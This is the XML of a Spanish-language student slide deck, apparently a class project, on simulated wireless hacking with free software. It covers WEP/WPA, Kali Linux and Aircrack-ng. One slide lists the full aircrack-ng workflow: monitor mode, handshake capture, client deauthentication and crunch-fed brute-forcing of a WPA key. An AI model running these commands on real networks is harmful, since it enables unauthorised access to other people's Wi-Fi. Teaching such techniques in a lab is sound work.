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7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94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65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58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8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1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91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20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5511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84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44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4D29A-7268-413D-A6EC-BA79820A1A34}" type="datetimeFigureOut">
              <a:rPr lang="es-EC" smtClean="0"/>
              <a:t>31/1/2020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3AF2D65-E136-46BB-8E15-5057134A0426}" type="slidenum">
              <a:rPr lang="es-EC" smtClean="0"/>
              <a:t>‹Nº›</a:t>
            </a:fld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97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E6738-E84B-47EB-A0B0-B0A1C06F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just"/>
            <a:r>
              <a:rPr lang="es-MX" sz="4800" dirty="0"/>
              <a:t>Simulación de hacking inalámbrico usando recursos de red y software libre. </a:t>
            </a:r>
            <a:endParaRPr lang="es-EC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6CA3B6-5947-499D-80BC-B9CBB3609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859503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es-MX" sz="7200" dirty="0"/>
              <a:t>INTEGRANTES:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="r"/>
            <a:r>
              <a:rPr lang="es-EC" sz="7200" dirty="0"/>
              <a:t>Córdova Balón Alex Alberto </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="r"/>
            <a:r>
              <a:rPr lang="es-EC" sz="7200" dirty="0"/>
              <a:t>Alcívar Peña Kevin Eduardo</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="r"/>
            <a:r>
              <a:rPr lang="es-EC" sz="7200" dirty="0"/>
              <a:t>Cevallos Salas Carlos Xavier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52448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009ECE8-4D8D-4147-B9B9-CF6D0139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36" y="0"/>
            <a:ext cx="10191008" cy="20408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138B18-D4DD-455C-93A3-08597ADF0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94" y="1029527"/>
            <a:ext cx="9658971" cy="57399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766A4A-1A79-42A5-A1E9-41028AD69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28" y="1020417"/>
            <a:ext cx="7526285" cy="49511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545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C6DA2-BDEC-4F4E-954D-B9B309BC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WEP Y WPA</a:t>
            </a:r>
            <a:endParaRPr lang="es-EC" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1028" name="Picture 4" descr="Resultado de imagen de TIPOS DE SEGURIDAD WIRELESS&quot;">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3573E895-757C-4F5D-9BC0-2CC4E5ED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6" y="2063579"/>
            <a:ext cx="5811501" cy="30079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67331E2-AA5D-40B4-A4B8-F7691976A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37" y="2015732"/>
            <a:ext cx="4250017" cy="3450613"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="just"/>
            <a:r>
              <a:rPr lang="es-MX" dirty="0"/>
              <a:t>WEP fue el primer estándar de seguridad para redes </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-MX" dirty="0" err="1"/>
              <a:t>Wi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-MX" dirty="0"/>
              <a:t>-Fi</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just"/>
            <a:r>
              <a:rPr lang="es-MX" dirty="0"/>
              <a:t>WPA2 Surgió para corregir las limitaciones del WEP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40461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BA93C-6597-4D1E-B7C6-DE0E202B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s-MX" dirty="0"/>
              <a:t>Diagrama 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3668A6-ECF3-4A3C-8FB8-B39AA470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015" y="2230197"/>
            <a:ext cx="5657850" cy="33909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102" name="Picture 6" descr="Resultado de imagen de gifs redes&quot;">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F754BA59-7541-4DAF-A890-5FA296F1D23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075" y="1536847"/>
            <a:ext cx="2855059" cy="25695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157BD8-76C7-4070-A20E-B0B8DB0EB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634" y="2468100"/>
            <a:ext cx="1276350" cy="16383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066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0E88D-EC76-4F76-BF84-EABEFE9C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entidad/relación</a:t>
            </a:r>
            <a:endParaRPr lang="es-EC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C046EBE-0CF6-4271-A7DA-17D3A5C56B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6880" y="2016125"/>
            <a:ext cx="6072565" cy="34496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3878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09E99-7846-4D1F-8402-8F10CCA9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</a:t>
            </a:r>
            <a:endParaRPr lang="es-EC" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2050" name="Picture 2" descr="Resultado de imagen de kali linux&quot;">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F43088C9-D593-4DED-9F27-183C7643AB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1" y="2150660"/>
            <a:ext cx="5449319" cy="28535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Resultado de imagen de Aircrack-ng&quot;">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FE9E7738-57CA-4AD3-98DD-3BE7B6F6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6" y="125540"/>
            <a:ext cx="4845124" cy="29343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Aircrack-ng&quot;">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D6DBD9C9-701B-4EFD-9B38-B3990458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05" y="3369042"/>
            <a:ext cx="4032286" cy="20076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1A10AFB-CD2F-4034-A3B3-96EAD3A0E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6" t="9827" r="26730" b="21216"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6157889" y="0"/>
            <a:ext cx="6034111" cy="3812345"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1026" name="Picture 2" descr="Resultado de imagen de parrot os&quot;">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0F25912E-5614-4D6F-B5A8-EBEF3D82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" y="2006726"/>
            <a:ext cx="6158805" cy="34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91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F10B2-077F-4A88-B2D7-24A0BF60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694BB1-8A86-4B8C-9588-91AEE6A3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36873"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="376156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618B1-331B-4AAC-B4C9-F4C548EB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X|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C75F04-50BF-4B8A-A730-10462B878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808F62-0A5B-4813-9925-830E0234A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7032"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="341794"/>
            <a:ext cx="12192000" cy="57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8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3EA0A4-A0A6-4E2D-8765-2722EEA9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18052"/>
            <a:ext cx="11410121" cy="5804452"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-EC" sz="2800" b="1" dirty="0"/>
              <a:t>Comando a utilizar</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-ES" b="1" dirty="0" err="1"/>
              <a:t>airmon</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" b="1" dirty="0"/>
              <a:t>-ng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kill</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>Comando que mata los procesos que puedan evitar crackear la red</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-EC" b="1" dirty="0" err="1"/>
              <a:t>airmon</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-EC" b="1" dirty="0"/>
              <a:t>-ng </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-EC" b="1" dirty="0" err="1"/>
              <a:t>start</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-EC" b="1" dirty="0"/>
              <a:t> wlan0 </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-ES" b="1" dirty="0" err="1"/>
              <a:t>airodump</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" b="1" dirty="0"/>
              <a:t>-ng wlan0mon </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>Escanea todas las redes wifi que se encuentren alrededor y se puede </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1"/>
              <a:t>observarque</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t> clientes </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1"/>
              <a:t>estan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t> conectados a la red wifi</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-EC" b="1" dirty="0" err="1"/>
              <a:t>airodump</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-EC" b="1" dirty="0"/>
              <a:t>-ng -c canal -w </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-EC" b="1" dirty="0" err="1"/>
              <a:t>archivo.cap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-EC" b="1" dirty="0"/>
              <a:t>  --</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-EC" b="1" dirty="0" err="1"/>
              <a:t>bssid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-EC" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-EC" b="1" dirty="0" err="1"/>
              <a:t>macDelRouter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-EC" b="1" dirty="0"/>
              <a:t> wlan0mon</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-EC" dirty="0"/>
              <a:t> autentificación</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-EC" b="1" dirty="0" err="1"/>
              <a:t>aireplay</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-EC" b="1" dirty="0"/>
              <a:t>-ng -0 5 -a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-EC" b="1" dirty="0" err="1"/>
              <a:t>macDelRouter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-EC" b="1" dirty="0"/>
              <a:t> -c </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-EC" b="1" dirty="0" err="1"/>
              <a:t>macDeAlgunCliente</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-EC" b="1" dirty="0"/>
              <a:t> wlan0mon </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-EC" dirty="0"/>
              <a:t>Hacemos que el cliente se autentique de nuevo</a:t>
            </a:r>
            <a:endParaRPr lang="es-EC" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-EC" b="1" dirty="0" err="1"/>
              <a:t>crunch</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-EC" b="1" dirty="0"/>
              <a:t> 8 8 -t %%%%%%%%%% 1234567890 | </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-EC" b="1" dirty="0" err="1"/>
              <a:t>aircrack</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-EC" b="1" dirty="0"/>
              <a:t>-ng -w - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-EC" b="1" dirty="0" err="1"/>
              <a:t>archivo.cap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-EC" b="1" dirty="0"/>
              <a:t> -e </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-EC" b="1" dirty="0" err="1"/>
              <a:t>nombreDelRouter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30594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D14C08-D3ED-4882-B0E6-DBF03D316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2462" cy="255767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0D77E7-4A15-4902-89C4-B528EAE85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5" y="883548"/>
            <a:ext cx="8901182" cy="22959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EC47A08-46BA-46DF-83B4-BAF80A041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17" y="1773101"/>
            <a:ext cx="9590751" cy="45879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6ED74B-102A-4AFE-BAC7-FDF6F0CBE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513"/>
            <a:ext cx="10768176" cy="3102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57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246</TotalTime>
  <Words>148</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>Panorámica</PresentationFormat>
  <Paragraphs>19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Galería</vt:lpstr>
      <vt:lpstr>Simulación de hacking inalámbrico usando recursos de red y software libre. </vt:lpstr>
      <vt:lpstr>WEP Y WPA</vt:lpstr>
      <vt:lpstr>Diagrama </vt:lpstr>
      <vt:lpstr>Modelo entidad/relación</vt:lpstr>
      <vt:lpstr>recursos</vt:lpstr>
      <vt:lpstr>Presentación de PowerPoint</vt:lpstr>
      <vt:lpstr>X|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de hacking inalámbrico usando recursos de red y software libre.</dc:title>
  <dc:creator>Estudiante</dc:creator>
  <cp:lastModifiedBy>Kenneth Jeremy Veintimilla Bozada</cp:lastModifiedBy>
  <cp:revision>20</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2020-01-30T14:49:31Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2020-02-01T03:50:23Z</dcterms:modified>
</cp:coreProperties>
</file>